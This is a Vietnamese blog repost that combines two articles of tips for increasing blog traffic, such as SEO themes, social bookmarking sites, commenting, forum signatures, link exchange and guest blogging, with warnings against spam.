Các theme mà blogviet nghĩ có khả năng SEO tốt do các chuyên gia và blogger nổi tiếng đánh giá là: Thesis, One Theme, Hybrid (News)…đã được tối ưu khả năng SEO nên các bạn không phải lo nhiều. Tuy nhiên, đó không phải là tất cả, bạn vẫn cần có một sitemap và tài khoản tại Google, Yahoo và MSN Webmaster Tool để hoàn thiện tính năng SEO cho blog của mình.
8 – Đăng bài lên các trang social bookmarking:
Không biết các bạn nghĩ sao chứ blogviet cũng nhận được khá nhiều traffic từ nguồn này. Trên thế giới có nhiều trang như Digg, StumbleUpon, Sphinn, Mix, Reddit…còn ở Việt Nam bạn nên tham gia vào các trang như Một Trăm Độ, LinkHay, TagVN hay Vietkicks để tăng lượng traffic cho mình nhé.
Kinh nghiệm để thu hút traffic trên các trang này là được bầu chọn nhiều thì sẽ có khả năng được hiện trong top các bài hot và traffic cứ thế mà tăng thôi. Để làm được điều đó, trước hết thông tin phải hay và hữu ích và quan trọng nữa là có nhiều bạn bè/theo đuôi vì đó sẽ là những người có khả năng vote cho bài của bạn lên top đó.
9. Góp ý trên các blog khác:
Mình đã từng đề cập về vấn đề tại sao không comment trên blog mà bạn đọc. Đâu phải chỉ bày tỏ quan điểm mà chỉ là sự cám ơn hay hỏi han. Cách này sẽ giúp để lại link tới blog của bạn và những người thăm sau bạn sẽ có khả năng click vào link đó.
Thủ thuật để comment được gây ấn tượng thì nhiều blogger nổi tiếng đã đề cập tuy nhiên mình chỉ khuyên là nên kèm theo URL của blog mình khi góp ý trên blog của người khác nhé.
Trên BlogViet, mình có cài thêm CommentLuv, một plugin giúp chèn link tới bài viết mới nhất trên blog của commenter vào mục góp ý. Ngay khi bạn chèn đúng URL của blog thì CommentLuv lập tức hiển thị bài đăng mới nhất của bạn và sau khi đăng góp ý sẽ hiện luôn bài đó một cách tự động ngay dưới góp ý của bạn. Đó cũng là cách giúp bạn tăng traffic từ chính comment của mình.
BlogViet cũng chèn cả script của MyBloglog để kiểm tra xem có bao nhiêu lần một link được click từ blogviet. Nếu bạn rê chuột tới 1 link bất kỳ trên blogviet sẽ hiện ra có bao nhiêu click tới blog của bạn đó.
Cũng xin lưu ý thêm một chút về comment trên blog khác là các bạn nên tránh các lỗi để các góp ý của bạn không bị gây phản cảm hay bị người khác coi là spam và hình ảnh của bạn cũng sẽ bị ảnh hưởng giống như bài 6 điểm cần tránh khi comment trên một blog khác của tác giả Super Marketing Việt Nam đã đề cập nhé :-)
10. Đăng bài trên blog bạn bè:
Khác một chút với Gửi bài viết lên các trang lớn như ở trên. Bạn vẫn có thể gửi bài tới các blog mà bạn yêu thích như BlogViet chẳng hạn. Blog của bạn thiên về xây dựng, du lịch, tài chính nhưng bạn có ý tưởng và có bài về thủ thuật blog, kiếm tiền trên mạng muốn chia sẻ. Hãy liên hệ với tác giả của blog mà bạn cần đăng để biết chi tiết.
Thông thường admin của blog sẽ có những ưu đãi như đặt link của bạn trên trang chủ, có lời giới thiệu trước/sau bài của bạn để độc giả biết đến bạn và chắc chắn bạn sẽ nhận được traffic từ các bài đó.
Ngoài các cách đã nêu ở trên còn có vô vàn cách khác mà các bạn có thể tậ dụng để tăng traffic của mình thông qua việc các mạng xã hội như bài viết cách tận dụng các mạng xã hội để quảng bá website của tác giả Hỗn Tạp hay sử dụng dịch vụ miễn phí của Twitter để tăng traffic thông qua 99 công cụ hữu ích như Giải Pháp Số đã đề cập…v…v…
Có rất nhiều cách nữa, chỉ xin chia sẻ một vài kinh nghiệm bé nhỏ mà mình thường làm, hy vọng giúp được các bạn ít nhiều.
(eblogviet)
Tất cả mọi blogger đều muốn blog của mình có đông người truy cập. Nếu bạn làm một blog với nội dung rất hay nhưng chẳng ai vào thì cũng như không. Ngoài ra để kiếm tiền từ blog của mình thì bạn cần một lượng traffic kha khá nếu không muốn nói là nhiều.
Vậy làm sao để có được lượng traffic như ý muốn? Sau đây là một số cách Misao muốn chia sẻ với các bạn giúp các bạn tăng gấp đôi lượng truy cập tới blog của mình trong 1 tuần.
Đăng tải blog của bạn lên các trang social bookmarking là một trong những cách nhanh nhất để thu hút traffic. Nếu bạn có một bài viết hay, độc đáo thì còn chần chừ gì nữa mà không đăng tải nó lên các SB ngay? Bạn sẽ thấy ngạc nhiên vì những gì nó đem lại đấy.
Một số Social Bookmarking Việt Nam:
- Mottramdo.com
- Linkhay.com
- Tagvn.com
- Vietkicks.com
- ishare.vn
- Buzz.vn
Đặt link tới blog của bạn trong chữ kí cũng thu hút được không ít lượng truy cập. Tất nhiên bạn cũng phải là một thành viên năng nổ, nhiệt tình post bài trên forum đó. Ngoài ra một số forum, diễn đàn còn có box riêng cho thành viên tự giới thiệu website/blog của mình.
Tuy nhiên Misao lưu ý với các bạn rằng tuyệt đối không SPAM quảng cáo vì làm vậy sẽ khiến bạn không những bị ban nick mà còn gây phản tác dụng trong việc quảng bá website.
Một số diễn đàn lớn cho phép đặt link ở chữ kí:
- DDTH.com – Diễn Đàn Tin Học
- Gamevn.com – Diễn Đàn Game
Nguồn traffic đến từ các Search Engine là cực kì lớn. Nếu bạn làm tốt việc SEO cho blog/website của mình thì Misao đảm bảo bạn sẽ có được nguồn traffic ổn định và đều đặn. Đặc biệt là nguồn traffic này sẽ tăng dần theo chất lượng và số lượng bài viết của bạn. Do vậy bạn hãy quan tâm hơn đến việc SEO cho blog/website của mình. Nếu bạn đang sử dụng Wordpress để làm blog thì bạn có thể tham khảo bài viết “5 SEO Plugins không thể thiếu cho Wordpress“.
Ngoài ra bạn còn có thể sử dụng các SEO Tools dành cho blogger chuyên nghiệp.
Hãy tìm những blog có cùng chủ đề với blog của bạn và để lại comment trên những blog đó. Lưu ý là không bao giờ spam comment ví dụ “Hay lắm nè, click here, vào đây xem nè…v.v” vì những comment như thế luôn bị xóa và bạn sẽ để lại ấn tượng xấu cho chủ blog đó.
Đây cũng là một bước quan trọng nếu bạn muốn trao đổi liên kết với blog/website đó.
Trao đổi liên kết sẽ giúp blog của bạn tăng traffic và pagerank. Tuy nhiên để làm được điều này bạn cần phải có quan hệ tốt với các webmaster khác. Ngoài ra bạn cũng có thể vào các diễn đàn và post các bài yêu cầu trao đổi link, liên kết.
Ví dụ: ddth.com có box CLB Webmaster hoặc Hot Links…
Guest Blogging có nghĩa là bạn gửi bài viết của bạn tới admin/webmaster một blog nào đó. Nếu bài viết của bạn hay thì họ sẽ đăng bài viết đó lên blog của họ và kèm 1 backlink tới blog của bạn ở cuối bài viết. Cách này cũng là một trong những cách quảng bá blog rất hiệu quả vì lượng traffic của những blog nổi tiếng là rất lớn. Chỉ cần một phần nhỏ trong đó click vào link của blog bạn là bạn đã có thêm rất nhiều visitors rồi.
Nếu bạn có khả năng làm video, ebook thì bạn có thể upload chúng lên các site chia sẻ video/file lớn như Youtube, Rapidshare, Mediafire…v.v. Bạn có thể đặt watermark tới địa chỉ blog của bạn trong video, ảnh hoặc đặt link trong phần Description. Ngoài ra đặt tên file dưới dạng xxx_blogcuaban.com cũng là một ý tưởng hay.
Sau đó bạn có thể chia sẻ link download file đó trên các diễn đàn, qua IM, facebook, twitter…v.v
Đây cũng là một trong nhưng cách làm tăng traffic rất tốt cho blog của bạn. Đặt link của bạn trong profile của Facebook, Twitter sẽ giúp mọi người biết đến blog của bạn nhiều hơn. Điểm mạnh của các mạng xã hội là có số lượng người dùng rất lớn và khả năng kết nối các thành viên rất cao. Do vậy bạn sẽ dễ dàng giới thiệu blog/website của mình đến nhiều người cùng lúc.
(misaoblog)
Giảm nhẹ tải Theo 911 |
